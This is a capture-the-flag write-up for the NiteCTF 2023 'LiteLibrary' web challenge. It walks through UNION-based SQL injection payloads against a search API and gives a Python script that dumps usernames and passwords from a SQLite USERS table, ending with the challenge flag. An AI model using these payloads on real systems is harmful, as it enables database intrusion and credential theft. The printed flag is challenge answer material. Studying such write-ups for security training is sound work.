NiteCTF 2023 : LiteLibrary
Context
We're sent a website (http://litelibrary.web.nitectf.live) that serves as a library.
Writeup
On the website, we can find an API endpoint at /api/search and by trying /api/search?q=aaa'+OR+1=1. We find out that there is an SQL Injection vulnerability. We can also try a few things to find what dbms is used and this request /api/search?q='+union+select+sqlite_version(),2,3,4,5-- tells us that it is using a sqlite database.
Moreover, if we try to request this we can deduce the database's tables with this request :
Request:
GET /api/search?q=aaaaaa'+union+select+table,2,3,4,5+from+sqlite_schema+order+by+name+limit+1,1-- HTTP/1.1
Response :
[{"title":"CREATE TABLE USERS (liteId TEXT, liteUsername TEXT, gender TEXT, liteNick TEXT, litePass TEXT, dateCreated TEXT)","author":2,"pages":3,"imageLink":4,"link":5}]
So in order to extract the table users, we can use this script that I wrote :
import requests
api_url_s = "http://litelibrary.web.nitectf.live/api/search?q=aaaaa'+UNION+SELECT+liteUsername,liteId,liteNick,litePass,4+FROM+USERS+ORDER+BY+liteId+LIMIT+"
api_url_e = ",1--"
for i in range(0,100):
r = requests.get(api_url_s+str(i)+api_url_e)
if r.status_code == 200 :
if r.text.find("nite{") != -1:
print(f"{i}:",r.text)
And running this script, we find the flag :
$ py extract.py
55: [{"title":"madmaxfuryyyyy2344","author":"28582015-49f6-43f8-9aad-a9e5d4a5687f","pages":"nite{t00_l1t3_huh_50m30n3_g37_an71_g2av17y_0v3r_h3r3}","imageLink":"yeehaaw1amMadx","link":4}]